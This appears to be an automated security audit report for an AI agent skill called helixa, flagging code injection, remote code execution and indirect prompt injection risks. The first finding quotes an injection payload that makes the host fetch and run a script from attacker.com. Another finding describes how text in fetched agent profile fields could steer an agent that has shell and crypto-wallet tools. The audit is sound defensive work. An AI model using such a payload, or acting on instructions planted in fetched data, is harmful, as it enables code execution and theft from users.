Skills
skills/bankrbot/skills/helixa/Gen Agent Trust Hub

helixa

Fail

Audited by Gen Agent Trust Hub on Mar 22, 2026

Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADSPROMPT_INJECTION
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The script scripts/helixa-search.sh is vulnerable to Python code injection. It takes a user-supplied search query and interpolates it directly into a python3 -c command string using single quotes. A crafted query containing a single quote and malicious Python code (e.g., '); import os; os.system('curl attacker.com/payload | bash'); print(') will execute the injected code on the host system.
  • [REMOTE_CODE_EXECUTION]: Automated security scans identified a pattern in scripts/check-cred.sh where data fetched from https://api.helixa.xyz/api/v2/cred/${AGENT_ID} is piped directly to the python3 interpreter. While the script currently targets the json.tool module, any compromise of the remote endpoint or manipulation of the piping logic could allow a malicious server to execute arbitrary code.
  • [EXTERNAL_DOWNLOADS]: The skill makes frequent requests to api.helixa.xyz to retrieve agent profiles, statistics, and reputation data. This domain is an external resource not identified as a trusted service, representing a dependency on non-verified infrastructure for core functionality.
  • [PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection (Category 8) due to the handling of external data.
  • Ingestion points: User-generated on-chain content such as agent "narratives", "traits", and "personality" fields are ingested from api.helixa.xyz via helixa-agent.sh and helixa-search.sh.
  • Boundary markers: There are no delimiters or explicit instructions to the agent to ignore embedded commands within these fields when processing them.
  • Capability inventory: The agent has access to powerful tools including network requests (curl), shell execution, and cryptocurrency wallet operations (cast).
  • Sanitization: No programmatic sanitization or validation is performed on the retrieved content; the skill relies solely on a textual warning in the security section of SKILL.md.
  • [COMMAND_EXECUTION]: Multiple scripts execute shell commands (curl, cast) using variables derived from user input or remote API responses without robust validation, increasing the risk of command argument injection.
Recommendations
  • HIGH: Downloads and executes remote code from: https://api.helixa.xyz/api/v2/cred/${AGENT_ID} - DO NOT USE without thorough review
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Mar 22, 2026, 09:46 PM